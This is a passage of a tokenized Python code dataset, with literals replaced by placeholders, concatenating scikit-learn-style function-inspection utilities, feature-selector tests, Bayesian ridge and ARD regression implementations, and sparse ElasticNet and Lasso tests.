<NUM_LIT:1> ] = '<STR_LIT>' <EOL> filename = '<STR_LIT:->' . join ( parts ) <EOL> if filename . endswith ( '<STR_LIT>' ) : <EOL> filename = filename [ : - <NUM_LIT:3> ] <EOL> module = module + '<STR_LIT:->' + filename <EOL> module = module . split ( '<STR_LIT:.>' ) <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> name = func . func_name <EOL> elif hasattr ( func , '<STR_LIT>' ) : <EOL> name = func . __name__ <EOL> else : <EOL> name = '<STR_LIT>' <EOL> if resolv_alias : <EOL> if hasattr ( func , '<STR_LIT>' ) and name in func . func_globals : <EOL> if not func . func_globals [ name ] is func : <EOL> name = '<STR_LIT>' % name <EOL> if inspect . ismethod ( func ) : <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> klass = func . im_class <EOL> module . append ( klass . __name__ ) <EOL> if os . name == '<STR_LIT>' and win_characters : <EOL> name = _clean_win_chars ( name ) <EOL> module = [ _clean_win_chars ( s ) for s in module ] <EOL> return module , name <EOL> def getfullargspec ( func ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return inspect . getfullargspec ( func ) <EOL> except AttributeError : <EOL> arg_spec = inspect . getargspec ( func ) <EOL> import collections <EOL> tuple_fields = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> tuple_type = collections . namedtuple ( '<STR_LIT>' , tuple_fields ) <EOL> return tuple_type ( args = arg_spec . args , <EOL> varargs = arg_spec . varargs , <EOL> varkw = arg_spec . keywords , <EOL> defaults = arg_spec . defaults , <EOL> kwonlyargs = [ ] , <EOL> kwonlydefaults = None , <EOL> annotations = { } ) <EOL> def _signature_str ( function_name , arg_spec ) : <EOL> """<STR_LIT>""" <EOL> arg_spec_for_format = arg_spec [ : <NUM_LIT:7> if PY3_OR_LATER else <NUM_LIT:4> ] <EOL> arg_spec_str = inspect . formatargspec ( * arg_spec_for_format ) <EOL> return '<STR_LIT>' . format ( function_name , arg_spec_str ) <EOL> def _function_called_str ( function_name , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> template_str = '<STR_LIT>' <EOL> args_str = repr ( args ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> kwargs_str = '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % ( k , v ) <EOL> for k , v in kwargs . items ( ) ) <EOL> return template_str . format ( function_name , args_str , <EOL> kwargs_str ) <EOL> def filter_args ( func , ignore_lst , args = ( ) , kwargs = dict ( ) ) : <EOL> """<STR_LIT>""" <EOL> args = list ( args ) <EOL> if isinstance ( ignore_lst , _basestring ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( ignore_lst , type ( ignore_lst ) ) ) <EOL> if ( not inspect . ismethod ( func ) and not inspect . isfunction ( func ) ) : <EOL> if ignore_lst : <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % func , stacklevel = <NUM_LIT:2> ) <EOL> return { '<STR_LIT:*>' : args , '<STR_LIT>' : kwargs } <EOL> arg_spec = getfullargspec ( func ) <EOL> arg_names = arg_spec . args + arg_spec . kwonlyargs <EOL> arg_defaults = arg_spec . defaults or ( ) <EOL> arg_defaults = arg_defaults + tuple ( arg_spec . kwonlydefaults [ k ] <EOL> for k in arg_spec . kwonlyargs ) <EOL> arg_varargs = arg_spec . varargs <EOL> arg_varkw = arg_spec . varkw <EOL> if inspect . ismethod ( func ) : <EOL> args = [ func . __self__ , ] + args <EOL> _ , name = get_func_name ( func , resolv_alias = False ) <EOL> arg_dict = dict ( ) <EOL> arg_position = - <NUM_LIT:1> <EOL> for arg_position , arg_name in enumerate ( arg_names ) : <EOL> if arg_position < len ( args ) : <EOL> if arg_name not in arg_spec . kwonlyargs : <EOL> arg_dict [ arg_name ] = args [ arg_position ] <EOL> else : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( arg_name , <EOL> _signature_str ( name , arg_spec ) , <EOL> _function_called_str ( name , args , kwargs ) ) <EOL> ) <EOL> else : <EOL> position = arg_position - len ( arg_names ) <EOL> if arg_name in kwargs : <EOL> arg_dict [ arg_name ] = kwargs . pop ( arg_name ) <EOL> else : <EOL> try : <EOL> arg_dict [ arg_name ] = arg_defaults [ position ] <EOL> except ( IndexError , KeyError ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( _signature_str ( name , arg_spec ) , <EOL> _function_called_str ( name , args , kwargs ) ) <EOL> ) <EOL> varkwargs = dict ( ) <EOL> for arg_name , arg_value in sorted ( kwargs . items ( ) ) : <EOL> if arg_name in arg_dict : <EOL> arg_dict [ arg_name ] = arg_value <EOL> elif arg_varkw is not None : <EOL> varkwargs [ arg_name ] = arg_value <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , arg_name ) ) <EOL> if arg_varkw is not None : <EOL> arg_dict [ '<STR_LIT>' ] = varkwargs <EOL> if arg_varargs is not None : <EOL> varargs = args [ arg_position + <NUM_LIT:1> : ] <EOL> arg_dict [ '<STR_LIT:*>' ] = varargs <EOL> for item in ignore_lst : <EOL> if item in arg_dict : <EOL> arg_dict . pop ( item ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( item , <EOL> _signature_str ( name , arg_spec ) ) <EOL> ) <EOL> return arg_dict <EOL> def format_signature ( func , * args , ** kwargs ) : <EOL> module , name = get_func_name ( func ) <EOL> module = [ m for m in module if m ] <EOL> if module : <EOL> module . append ( name ) <EOL> module_path = '<STR_LIT:.>' . join ( module ) <EOL> else : <EOL> module_path = name <EOL> arg_str = list ( ) <EOL> previous_length = <NUM_LIT:0> <EOL> for arg in args : <EOL> arg = pformat ( arg , indent = <NUM_LIT:2> ) <EOL> if len ( arg ) > <NUM_LIT> : <EOL> arg = '<STR_LIT>' % arg [ : <NUM_LIT> ] <EOL> if previous_length > <NUM_LIT> : <EOL> arg = '<STR_LIT>' % arg <EOL> previous_length = len ( arg ) <EOL> arg_str . append ( arg ) <EOL> arg_str . extend ( [ '<STR_LIT>' % ( v , pformat ( i ) ) for v , i in kwargs . items ( ) ] ) <EOL> arg_str = '<STR_LIT:U+002CU+0020>' . join ( arg_str ) <EOL> signature = '<STR_LIT>' % ( name , arg_str ) <EOL> return module_path , signature <EOL> def format_call ( func , args , kwargs , object_name = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> path , signature = format_signature ( func , * args , ** kwargs ) <EOL> msg = '<STR_LIT>' % ( <NUM_LIT> * '<STR_LIT:_>' , object_name , <EOL> path , signature ) <EOL> return msg </s>
<s> import numpy as np <EOL> from scipy import sparse as sp <EOL> from nose . tools import assert_raises , assert_equal <EOL> from numpy . testing import assert_array_equal <EOL> from sklearn . base import BaseEstimator <EOL> from sklearn . feature_selection . base import SelectorMixin <EOL> from sklearn . utils import check_array <EOL> class StepSelector ( SelectorMixin , BaseEstimator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , step = <NUM_LIT:2> ) : <EOL> self . step = step <EOL> def fit ( self , X , y = None ) : <EOL> X = check_array ( X , '<STR_LIT>' ) <EOL> self . n_input_feats = X . shape [ <NUM_LIT:1> ] <EOL> return self <EOL> def _get_support_mask ( self ) : <EOL> mask = np . zeros ( self . n_input_feats , dtype = bool ) <EOL> mask [ : : self . step ] = True <EOL> return mask <EOL> support = [ True , False ] * <NUM_LIT:5> <EOL> support_inds = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> , <NUM_LIT:8> ] <EOL> X = np . arange ( <NUM_LIT:20> ) . reshape ( <NUM_LIT:2> , <NUM_LIT:10> ) <EOL> Xt = np . arange ( <NUM_LIT:0> , <NUM_LIT:20> , <NUM_LIT:2> ) . reshape ( <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> Xinv = X . copy ( ) <EOL> Xinv [ : , <NUM_LIT:1> : : <NUM_LIT:2> ] = <NUM_LIT:0> <EOL> y = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> feature_names = list ( '<STR_LIT>' ) <EOL> feature_names_t = feature_names [ : : <NUM_LIT:2> ] <EOL> feature_names_inv = np . array ( feature_names ) <EOL> feature_names_inv [ <NUM_LIT:1> : : <NUM_LIT:2> ] = '<STR_LIT>' <EOL> def test_transform_dense ( ) : <EOL> sel = StepSelector ( ) <EOL> Xt_actual = sel . fit ( X , y ) . transform ( X ) <EOL> Xt_actual2 = StepSelector ( ) . fit_transform ( X , y ) <EOL> assert_array_equal ( Xt , Xt_actual ) <EOL> assert_array_equal ( Xt , Xt_actual2 ) <EOL> assert_equal ( np . int32 , sel . transform ( X . astype ( np . int32 ) ) . dtype ) <EOL> assert_equal ( np . float32 , sel . transform ( X . astype ( np . float32 ) ) . dtype ) <EOL> names_t_actual = sel . transform ( [ feature_names ] ) <EOL> assert_array_equal ( feature_names_t , names_t_actual . ravel ( ) ) <EOL> assert_raises ( ValueError , sel . transform , np . array ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] ) ) <EOL> def test_transform_sparse ( ) : <EOL> sparse = sp . csc_matrix <EOL> sel = StepSelector ( ) <EOL> Xt_actual = sel . fit ( sparse ( X ) ) . transform ( sparse ( X ) ) <EOL> Xt_actual2 = sel . fit_transform ( sparse ( X ) ) <EOL> assert_array_equal ( Xt , Xt_actual . toarray ( ) ) <EOL> assert_array_equal ( Xt , Xt_actual2 . toarray ( ) ) <EOL> assert_equal ( np . int32 , sel . transform ( sparse ( X ) . astype ( np . int32 ) ) . dtype ) <EOL> assert_equal ( np . float32 , sel . transform ( sparse ( X ) . astype ( np . float32 ) ) . dtype ) <EOL> assert_raises ( ValueError , sel . transform , np . array ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] ) ) <EOL> def test_inverse_transform_dense ( ) : <EOL> sel = StepSelector ( ) <EOL> Xinv_actual = sel . fit ( X , y ) . inverse_transform ( Xt ) <EOL> assert_array_equal ( Xinv , Xinv_actual ) <EOL> assert_equal ( np . int32 , <EOL> sel . inverse_transform ( Xt . astype ( np . int32 ) ) . dtype ) <EOL> assert_equal ( np . float32 , <EOL> sel . inverse_transform ( Xt . astype ( np . float32 ) ) . dtype ) <EOL> names_inv_actual = sel . inverse_transform ( [ feature_names_t ] ) <EOL> assert_array_equal ( feature_names_inv , names_inv_actual . ravel ( ) ) <EOL> assert_raises ( ValueError , sel . inverse_transform , np . array ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] ) ) <EOL> def test_inverse_transform_sparse ( ) : <EOL> sparse = sp . csc_matrix <EOL> sel = StepSelector ( ) <EOL> Xinv_actual = sel . fit ( sparse ( X ) ) . inverse_transform ( sparse ( Xt ) ) <EOL> assert_array_equal ( Xinv , Xinv_actual . toarray ( ) ) <EOL> assert_equal ( np . int32 , <EOL> sel . inverse_transform ( sparse ( Xt ) . astype ( np . int32 ) ) . dtype ) <EOL> assert_equal ( np . float32 , <EOL> sel . inverse_transform ( sparse ( Xt ) . astype ( np . float32 ) ) . dtype ) <EOL> assert_raises ( ValueError , sel . inverse_transform , np . array ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] ) ) <EOL> def test_get_support ( ) : <EOL> sel = StepSelector ( ) <EOL> sel . fit ( X , y ) <EOL> assert_array_equal ( support , sel . get_support ( ) ) <EOL> assert_array_equal ( support_inds , sel . get_support ( indices = True ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from math import log <EOL> import numpy as np <EOL> from scipy import linalg <EOL> from . base import LinearModel <EOL> from . . base import RegressorMixin <EOL> from . . utils . extmath import fast_logdet , pinvh <EOL> from . . utils import check_X_y <EOL> class BayesianRidge ( LinearModel , RegressorMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , n_iter = <NUM_LIT> , tol = <NUM_LIT> , alpha_1 = <NUM_LIT> , alpha_2 = <NUM_LIT> , <EOL> lambda_1 = <NUM_LIT> , lambda_2 = <NUM_LIT> , compute_score = False , <EOL> fit_intercept = True , normalize = False , copy_X = True , <EOL> verbose = False ) : <EOL> self . n_iter = n_iter <EOL> self . tol = tol <EOL> self . alpha_1 = alpha_1 <EOL> self . alpha_2 = alpha_2 <EOL> self . lambda_1 = lambda_1 <EOL> self . lambda_2 = lambda_2 <EOL> self . compute_score = compute_score <EOL> self . fit_intercept = fit_intercept <EOL> self . normalize = normalize <EOL> self . copy_X = copy_X <EOL> self . verbose = verbose <EOL> def fit ( self , X , y ) : <EOL> """<STR_LIT>""" <EOL> X , y = check_X_y ( X , y , dtype = np . float64 , y_numeric = True ) <EOL> X , y , X_offset , y_offset , X_scale = self . _preprocess_data ( <EOL> X , y , self . fit_intercept , self . normalize , self . copy_X ) <EOL> n_samples , n_features = X . shape <EOL> alpha_ = <NUM_LIT:1.> / np . var ( y ) <EOL> lambda_ = <NUM_LIT:1.> <EOL> verbose = self . verbose <EOL> lambda_1 = self . lambda_1 <EOL> lambda_2 = self . lambda_2 <EOL> alpha_1 = self . alpha_1 <EOL> alpha_2 = self . alpha_2 <EOL> self . scores_ = list ( ) <EOL> coef_old_ = None <EOL> XT_y = np . dot ( X . T , y ) <EOL> U , S , Vh = linalg . svd ( X , full_matrices = False ) <EOL> eigen_vals_ = S ** <NUM_LIT:2> <EOL> for iter_ in range ( self . n_iter ) : <EOL> if n_samples > n_features : <EOL> coef_ = np . dot ( Vh . T , <EOL> Vh / ( eigen_vals_ + lambda_ / alpha_ ) [ : , None ] ) <EOL> coef_ = np . dot ( coef_ , XT_y ) <EOL> if self . compute_score : <EOL> logdet_sigma_ = - np . sum ( <EOL> np . log ( lambda_ + alpha_ * eigen_vals_ ) ) <EOL> else : <EOL> coef_ = np . dot ( X . T , np . dot ( <EOL> U / ( eigen_vals_ + lambda_ / alpha_ ) [ None , : ] , U . T ) ) <EOL> coef_ = np . dot ( coef_ , y ) <EOL> if self . compute_score : <EOL> logdet_sigma_ = lambda_ * np . ones ( n_features ) <EOL> logdet_sigma_ [ : n_samples ] += alpha_ * eigen_vals_ <EOL> logdet_sigma_ = - np . sum ( np . log ( logdet_sigma_ ) ) <EOL> rmse_ = np . sum ( ( y - np . dot ( X , coef_ ) ) ** <NUM_LIT:2> ) <EOL> gamma_ = ( np . sum ( ( alpha_ * eigen_vals_ ) / <EOL> ( lambda_ + alpha_ * eigen_vals_ ) ) ) <EOL> lambda_ = ( ( gamma_ + <NUM_LIT:2> * lambda_1 ) / <EOL> ( np . sum ( coef_ ** <NUM_LIT:2> ) + <NUM_LIT:2> * lambda_2 ) ) <EOL> alpha_ = ( ( n_samples - gamma_ + <NUM_LIT:2> * alpha_1 ) / <EOL> ( rmse_ + <NUM_LIT:2> * alpha_2 ) ) <EOL> if self . compute_score : <EOL> s = lambda_1 * log ( lambda_ ) - lambda_2 * lambda_ <EOL> s += alpha_1 * log ( alpha_ ) - alpha_2 * alpha_ <EOL> s += <NUM_LIT:0.5> * ( n_features * log ( lambda_ ) + <EOL> n_samples * log ( alpha_ ) - <EOL> alpha_ * rmse_ - <EOL> ( lambda_ * np . sum ( coef_ ** <NUM_LIT:2> ) ) - <EOL> logdet_sigma_ - <EOL> n_samples * log ( <NUM_LIT:2> * np . pi ) ) <EOL> self . scores_ . append ( s ) <EOL> if iter_ != <NUM_LIT:0> and np . sum ( np . abs ( coef_old_ - coef_ ) ) < self . tol : <EOL> if verbose : <EOL> print ( "<STR_LIT>" , str ( iter_ ) , "<STR_LIT>" ) <EOL> break <EOL> coef_old_ = np . copy ( coef_ ) <EOL> self . alpha_ = alpha_ <EOL> self . lambda_ = lambda_ <EOL> self . coef_ = coef_ <EOL> self . _set_intercept ( X_offset , y_offset , X_scale ) <EOL> return self <EOL> class ARDRegression ( LinearModel , RegressorMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , n_iter = <NUM_LIT> , tol = <NUM_LIT> , alpha_1 = <NUM_LIT> , alpha_2 = <NUM_LIT> , <EOL> lambda_1 = <NUM_LIT> , lambda_2 = <NUM_LIT> , compute_score = False , <EOL> threshold_lambda = <NUM_LIT> , fit_intercept = True , normalize = False , <EOL> copy_X = True , verbose = False ) : <EOL> self . n_iter = n_iter <EOL> self . tol = tol <EOL> self . fit_intercept = fit_intercept <EOL> self . normalize = normalize <EOL> self . alpha_1 = alpha_1 <EOL> self . alpha_2 = alpha_2 <EOL> self . lambda_1 = lambda_1 <EOL> self . lambda_2 = lambda_2 <EOL> self . compute_score = compute_score <EOL> self . threshold_lambda = threshold_lambda <EOL> self . copy_X = copy_X <EOL> self . verbose = verbose <EOL> def fit ( self , X , y ) : <EOL> """<STR_LIT>""" <EOL> X , y = check_X_y ( X , y , dtype = np . float64 , y_numeric = True ) <EOL> n_samples , n_features = X . shape <EOL> coef_ = np . zeros ( n_features ) <EOL> X , y , X_offset , y_offset , X_scale = self . _preprocess_data ( <EOL> X , y , self . fit_intercept , self . normalize , self . copy_X ) <EOL> keep_lambda = np . ones ( n_features , dtype = bool ) <EOL> lambda_1 = self . lambda_1 <EOL> lambda_2 = self . lambda_2 <EOL> alpha_1 = self . alpha_1 <EOL> alpha_2 = self . alpha_2 <EOL> verbose = self . verbose <EOL> alpha_ = <NUM_LIT:1.> / np . var ( y ) <EOL> lambda_ = np . ones ( n_features ) <EOL> self . scores_ = list ( ) <EOL> coef_old_ = None <EOL> for iter_ in range ( self . n_iter ) : <EOL> sigma_ = pinvh ( np . eye ( n_samples ) / alpha_ + <EOL> np . dot ( X [ : , keep_lambda ] * <EOL> np . reshape ( <NUM_LIT:1.> / lambda_ [ keep_lambda ] , [ <NUM_LIT:1> , - <NUM_LIT:1> ] ) , <EOL> X [ : , keep_lambda ] . T ) ) <EOL> sigma_ = np . dot ( sigma_ , X [ : , keep_lambda ] * <EOL> np . reshape ( <NUM_LIT:1.> / lambda_ [ keep_lambda ] , [ <NUM_LIT:1> , - <NUM_LIT:1> ] ) ) <EOL> sigma_ = - np . dot ( np . reshape ( <NUM_LIT:1.> / lambda_ [ keep_lambda ] , [ - <NUM_LIT:1> , <NUM_LIT:1> ] ) * <EOL> X [ : , keep_lambda ] . T , sigma_ ) <EOL> sigma_ . flat [ : : ( sigma_ . shape [ <NUM_LIT:1> ] + <NUM_LIT:1> ) ] += <NUM_LIT:1.> / lambda_ [ keep_lambda ] <EOL> coef_ [ keep_lambda ] = alpha_ * np . dot ( <EOL> sigma_ , np . dot ( X [ : , keep_lambda ] . T , y ) ) <EOL> rmse_ = np . sum ( ( y - np . dot ( X , coef_ ) ) ** <NUM_LIT:2> ) <EOL> gamma_ = <NUM_LIT:1.> - lambda_ [ keep_lambda ] * np . diag ( sigma_ ) <EOL> lambda_ [ keep_lambda ] = ( ( gamma_ + <NUM_LIT> * lambda_1 ) / <EOL> ( ( coef_ [ keep_lambda ] ) ** <NUM_LIT:2> + <EOL> <NUM_LIT> * lambda_2 ) ) <EOL> alpha_ = ( ( n_samples - gamma_ . sum ( ) + <NUM_LIT> * alpha_1 ) / <EOL> ( rmse_ + <NUM_LIT> * alpha_2 ) ) <EOL> keep_lambda = lambda_ < self . threshold_lambda <EOL> coef_ [ ~ keep_lambda ] = <NUM_LIT:0> <EOL> if self . compute_score : <EOL> s = ( lambda_1 * np . log ( lambda_ ) - lambda_2 * lambda_ ) . sum ( ) <EOL> s += alpha_1 * log ( alpha_ ) - alpha_2 * alpha_ <EOL> s += <NUM_LIT:0.5> * ( fast_logdet ( sigma_ ) + n_samples * log ( alpha_ ) + <EOL> np . sum ( np . log ( lambda_ ) ) ) <EOL> s -= <NUM_LIT:0.5> * ( alpha_ * rmse_ + ( lambda_ * coef_ ** <NUM_LIT:2> ) . sum ( ) ) <EOL> self . scores_ . append ( s ) <EOL> if iter_ > <NUM_LIT:0> and np . sum ( np . abs ( coef_old_ - coef_ ) ) < self . tol : <EOL> if verbose : <EOL> print ( "<STR_LIT>" % iter_ ) <EOL> break <EOL> coef_old_ = np . copy ( coef_ ) <EOL> self . coef_ = coef_ <EOL> self . alpha_ = alpha_ <EOL> self . sigma_ = sigma_ <EOL> self . lambda_ = lambda_ <EOL> self . _set_intercept ( X_offset , y_offset , X_scale ) <EOL> return self </s>
<s> import numpy as np <EOL> import scipy . sparse as sp <EOL> from sklearn . utils . testing import assert_array_almost_equal <EOL> from sklearn . utils . testing import assert_almost_equal <EOL> from sklearn . utils . testing import assert_equal <EOL> from sklearn . utils . testing import assert_less <EOL> from sklearn . utils . testing import assert_true <EOL> from sklearn . utils . testing import assert_greater <EOL> from sklearn . utils . testing import ignore_warnings <EOL> from sklearn . linear_model . coordinate_descent import ( Lasso , ElasticNet , <EOL> LassoCV , ElasticNetCV ) <EOL> def test_sparse_coef ( ) : <EOL> clf = ElasticNet ( ) <EOL> clf . coef_ = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> assert_true ( sp . isspmatrix ( clf . sparse_coef_ ) ) <EOL> assert_equal ( clf . sparse_coef_ . toarray ( ) . tolist ( ) [ <NUM_LIT:0> ] , clf . coef_ ) <EOL> def test_normalize_option ( ) : <EOL> X = sp . csc_matrix ( [ [ - <NUM_LIT:1> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] ] ) <EOL> y = [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> clf_dense = ElasticNet ( fit_intercept = True , normalize = True ) <EOL> clf_sparse = ElasticNet ( fit_intercept = True , normalize = True ) <EOL> clf_dense . fit ( X , y ) <EOL> X = sp . csc_matrix ( X ) <EOL> clf_sparse . fit ( X , y ) <EOL> assert_almost_equal ( clf_dense . dual_gap_ , <NUM_LIT:0> ) <EOL> assert_array_almost_equal ( clf_dense . coef_ , clf_sparse . coef_ ) <EOL> def test_lasso_zero ( ) : <EOL> X = sp . csc_matrix ( ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> y = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> T = np . array ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> clf = Lasso ( ) . fit ( X , y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT:0> ] ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> def test_enet_toy_list_input ( ) : <EOL> X = np . array ( [ [ - <NUM_LIT:1> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] ] ) <EOL> X = sp . csc_matrix ( X ) <EOL> Y = [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> T = np . array ( [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] , [ <NUM_LIT:4> ] ] ) <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0> , l1_ratio = <NUM_LIT:1.0> ) <EOL> ignore_warnings ( clf . fit ) ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT:1> ] ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0.5> , l1_ratio = <NUM_LIT> , max_iter = <NUM_LIT:1000> ) <EOL> clf . fit ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT> ] , decimal = <NUM_LIT:3> ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , decimal = <NUM_LIT:3> ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0.5> , l1_ratio = <NUM_LIT:0.5> ) <EOL> clf . fit ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT> ] , <NUM_LIT:3> ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <NUM_LIT:3> ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> def test_enet_toy_explicit_sparse_input ( ) : <EOL> f = ignore_warnings <EOL> X = sp . lil_matrix ( ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> X [ <NUM_LIT:0> , <NUM_LIT:0> ] = - <NUM_LIT:1> <EOL> X [ <NUM_LIT:2> , <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> Y = [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> T = sp . lil_matrix ( ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> T [ <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:2> <EOL> T [ <NUM_LIT:1> , <NUM_LIT:0> ] = <NUM_LIT:3> <EOL> T [ <NUM_LIT:2> , <NUM_LIT:0> ] = <NUM_LIT:4> <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0> , l1_ratio = <NUM_LIT:1.0> ) <EOL> f ( clf . fit ) ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT:1> ] ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0.5> , l1_ratio = <NUM_LIT> , max_iter = <NUM_LIT:1000> ) <EOL> clf . fit ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT> ] , decimal = <NUM_LIT:3> ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , decimal = <NUM_LIT:3> ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0.5> , l1_ratio = <NUM_LIT:0.5> ) <EOL> clf . fit ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT> ] , <NUM_LIT:3> ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <NUM_LIT:3> ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> def make_sparse_data ( n_samples = <NUM_LIT:100> , n_features = <NUM_LIT:100> , n_informative = <NUM_LIT:10> , seed = <NUM_LIT> , <EOL> positive = False , n_targets = <NUM_LIT:1> ) : <EOL> random_state = np . random . RandomState ( seed ) <EOL> w = random_state . randn ( n_features , n_targets ) <EOL> w [ n_informative : ] = <NUM_LIT:0.0> <EOL> if positive : <EOL> w = np . abs ( w ) <EOL> X = random_state . randn ( n_samples , n_features ) <EOL> rnd = random_state . uniform ( size = ( n_samples , n_features ) ) <EOL> X [ rnd > <NUM_LIT:0.5> ] = <NUM_LIT:0.0> <EOL> y = np . dot ( X , w ) <EOL> X = sp . csc_matrix ( X ) <EOL> if n_targets == <NUM_LIT:1> : <EOL> y = np . ravel ( y ) <EOL> return X , y <EOL> def _test_sparse_enet_not_as_toy_dataset ( alpha , fit_intercept , positive ) : <EOL> n_samples , n_features , max_iter = <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:1000> <EOL> n_informative = <NUM_LIT:10> <EOL> X , y = make_sparse_data ( n_samples , n_features , n_informative , <EOL> positive = positive ) <EOL> X_train , X_test = X [ n_samples // <NUM_LIT:2> : ] , X [ : n_samples // <NUM_LIT:2> ] <EOL> y_train , y_test = y [ n_samples // <NUM_LIT:2> : ] , y [ : n_samples // <NUM_LIT:2> ] <EOL> s_clf = ElasticNet ( alpha = alpha , l1_ratio = <NUM_LIT> , fit_intercept = fit_intercept , <EOL> max_iter = max_iter , tol = <NUM_LIT> , positive = positive , <EOL> warm_start = True ) <EOL> s_clf . fit ( X_train , y_train ) <EOL> assert_almost_equal ( s_clf . dual_gap_ , <NUM_LIT:0> , <NUM_LIT:4> ) <EOL> assert_greater ( s_clf . score ( X_test , y_test ) , <NUM_LIT> ) <EOL> d_clf = ElasticNet ( alpha = alpha , l1_ratio = <NUM_LIT> , fit_intercept = fit_intercept , <EOL> max_iter = max_iter , tol = <NUM_LIT> , positive = positive , <EOL> warm_start = True ) <EOL> d_clf . fit ( X_train . toarray ( ) , y_train ) <EOL> assert_almost_equal ( d_clf . dual_gap_ , <NUM_LIT:0> , <NUM_LIT:4> ) <EOL> assert_greater ( d_clf . score ( X_test , y_test ) , <NUM_LIT> ) <EOL> assert_almost_equal ( s_clf . coef_ , d_clf . coef_ , <NUM_LIT:5> ) <EOL> assert_almost_equal ( s_clf . intercept_ , d_clf . intercept_ , <NUM_LIT:5> ) <EOL> assert_less ( np . sum ( s_clf . coef_ != <NUM_LIT:0.0> ) , <NUM_LIT:2> * n_informative ) <EOL> def test_sparse_enet_not_as_toy_dataset ( ) : <EOL> _test_sparse_enet_not_as_toy_dataset ( alpha = <NUM_LIT:0.1> , fit_intercept = False , <EOL> positive = False ) <EOL> _test_sparse_enet_not_as_toy_dataset ( alpha = <NUM_LIT:0.1> , fit_intercept = True , 